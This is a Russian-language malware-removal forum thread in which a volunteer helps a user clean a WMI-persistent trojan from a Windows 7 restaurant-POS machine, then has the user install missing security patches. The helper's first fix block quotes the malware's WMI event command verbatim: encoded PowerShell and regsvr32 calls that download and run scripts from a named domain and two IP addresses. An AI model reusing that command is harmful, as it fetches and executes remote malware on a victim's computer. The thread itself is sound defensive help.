Не избавиться от вируса

[ria]

Здравствуйте. ОС Win 7 32 Prof. При проверке актуальным KVRT появляется сообщение о вирусе в систем мемори - trojan.multi.gen autorun wmi.a. Вроде как в безопасном режиме он удаляется, но через какое то время появляется вновь. Помогите избавиться, пожалуйста. Спасибо.

[Info_bot]

Уважаемый(ая) ria, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O23 - Service S3: Служба Google Update (gupdatem) - (gupdatem) - C:\Program Files\Google\Update\GoogleUpdate.exe /medsvc
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

[ria]

Пофиксил указанные Вами значения. После перезапуска компьютера их в HijackThis нет. Требуемый лог приложил.

[ria]

Пофиксил указанные значения. Требуемый лог прикладываю.

[Vvvyg]

Классика

Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
HotFix KB4074587 Внимание! Скачать обновления
HotFix KB4103712 Внимание! Скачать обновления
HotFix KB4343899 Внимание! Скачать обновления
HotFix KB4457145 Внимание! Скачать обновления
HotFix KB4462923 Внимание! Скачать обновления
HotFix KB4471318 Внимание! Скачать обновления

Устанавливайте, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017-м году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.

Проверьте также, установлены ли все сервис-паки и критические обновления к Microsoft SQL Server, сложные ли пароли к SA и другим учёткам. Проверьте левые задачи в планировщике MS SQL.
Меняйте админские пароли пользователей.
К компьютеру открыт доступ из интернета по множеству портов, в т. ч. и к SQL, видимо, чтобы уж наверняка взломали. Зачем, для чего - есть понимание?

[ria]

Спасибо большое, обновления установлю. По поводу понимания SQL - сложно сказать, на компьютере установлено дилерское ПО для работы системы общепита (ркипер), SQL является его составляющей частью, устанавливалось и настраивалось дилерами. Какие порты и т.п. им надо для работы их ПО - не влезал туда, откровенно говоря.

[Vvvyg]

Но хотя бы ясно, нужны к этому компьютеру подключения из интернета? Можно ограничить их с помощью файрвола, программного, либо аппаратного?

[ria]

Подключения нужны, на этом компьютере лежит sql-база, к которой подключаются торговые точки через Интернет за данными (ну, и в обратном порядке - для сброса данных). Что и как на нем должно быть открыто для такого алгоритма - буду уточнять у дилеров (если они сами понимают, как работает это ПО)...

[Vvvyg]

Как обновите систему - сделайте такой лог.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[ria]

Спасибо за помощь. Из обновлений пока установил 12 штук. Некоторые пишут - комп не предназначен для выбранного обновления. Логи прикладываю. Вроде как пока больше ничего не вылезает.

[Vvvyg]

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
HKLM\...\Run: [] => [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
2019-01-15 08:17 - 2019-01-15 12:24 - 000000080 _____ C:\Windows\system32\s
2019-01-15 08:17 - 2019-01-15 12:24 - 000000078 _____ C:\Windows\system32\ps
2019-01-15 08:17 - 2019-01-15 12:24 - 000000076 _____ C:\Windows\system32\p
Virustotal: C:\Windows\system32\csrse.exe
Virustotal: C:\Windows\system32\max.exe
2019-01-15 07:27 - 2019-01-15 07:27 - 000782848 _____ (TODO: <公司名>) C:\Windows\system32\csrse.exe
2019-01-15 07:27 - 2019-01-15 07:27 - 000697744 _____ C:\Windows\system32\max.exe
C:\Windows\Minidump\*.dmp
2019-01-15 01:24 - 2017-03-20 14:26 - 353586948 _____ C:\Windows\MEMORY.DMP
2019-01-15 07:27 - 2019-01-15 10:18 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2016-02-10 11:07 - 2016-08-24 13:23 - 000001288 _____ () C:\Users\Бухгалтерия\AppData\Roaming\ex_log.txt
Task: {123BA8A6-5359-4BE6-BCCC-79B22618ED2B} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {38042203-F5F0-46C9-BA12-1A0C480F836E} - \Mysa3 -> No File <==== ATTENTION
Task: {4859C2F3-469E-4E30-90AB-D3ECA49E4A09} - no filepath
Task: {8C67F843-D41F-47A7-AF4B-18CA82BA8AA9} - \Mysa1 -> No File <==== ATTENTION
Task: {A4E002A6-0CCF-4438-B05A-75347C1ACDC3} - \Mysa -> No File <==== ATTENTION
Task: {B18D267D-575A-45BA-AB96-70DB74BFF96E} - \Mysa2 -> No File <==== ATTENTION
Task: {BFF2A1F9-7FDC-44ED-B889-12B2C666AB48} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {D8293838-7085-4AA8-8778-BD0737369B3B} - no filepath
Task: {F5945473-7650-4C4B-938A-FAB6477B72ED} - \ok -> No File <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":
WMI:subscription\__EventFilter->BVTFilter:
WMI:subscription\CommandLineEventConsumer->BVTConsumer:
FirewallRules: [TCP Query User{254DA482-603F-4D85-A0B1-023530A2D833}C:\utm\jre\bin\javaw.exe] => (Allow) C:\utm\jre\bin\javaw.exe No File
FirewallRules: [UDP Query User{C59B15C1-228A-46C3-96DF-67A6E6580635}C:\utm\jre\bin\javaw.exe] => (Allow) C:\utm\jre\bin\javaw.exe No File
FirewallRules: [TCP Query User{0FAC0A0C-243F-4DCD-AE07-D9DB73D14869}C:\windows\system32\mshta.exe] => (Allow) C:\windows\system32\mshta.exe (Microsoft Corporation)
FirewallRules: [UDP Query User{89B8675B-3D80-4E17-9831-3C99F37EFE41}C:\windows\system32\mshta.exe] => (Allow) C:\windows\system32\mshta.exe (Microsoft Corporation)

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Перезагрузите систему самостоятельно.

Java 8 обязательно обновите до текущего билда, у Вас устаревшая версия со множеством критических уязвимостей.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

[ria]

Один лог прикладываю. А при попытке прикрепить архив образа автозапуска пишет о превышении предела сообщений на форуме. Как удалить предыдущие прикрепленные файлы - не совсем понимаю, я их вижу, могу выделить - но где что то типа кнопки Удалить - не нахожу на форме...

[Vvvyg]

Удалите вложения, относящиеся к самым старым темам.
Или выложите файл в облако/на файлообменник и дайте ссылку.

[ria]

Второй лог. Вложения почистил.

[Vvvyg]

Всё чисто.

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, приложите его к сообщению.

[ria]

Лог авз

[Vvvyg]

Пробуйте дообновить:

Поиск критических уязвимостей
Установите новый Internet Explorer
https://windows.microsoft.com/ru-ru/...er/download-ie

Накопительное обновление системы безопасности для битов аннулирования ActiveX
https://www.microsoft.com/downloads/...e-5a211a22de77

Уязвимость общих элементов управления Windows делает возможным удаленное выполнение кода
https://www.microsoft.com/downloads/...7-125e0e7320ae
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
https://www.microsoft.com/downloads/...D-2A29D709F93F

Обновление для системы безопасности Microsoft Office Word 2007
https://www.microsoft.com/downloads/...8-6ccfdfa399c5
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
https://www.microsoft.com/downloads/...D-2A29D709F93F

Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack
https://www.microsoft.com/downloads/...0-4b18081bd536

Установлен Adobe Reader версии 11.0.00. Опасно использовать версии до 11.0.08
https://ardownload.adobe.com/pub/ado...drUpd11023.msp

[ria]

Спасибо Вам огромное за помощь!!! Что дообновится - дообновлю. Пока все работает корректно. Удачи Вам.

[Vvvyg]

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.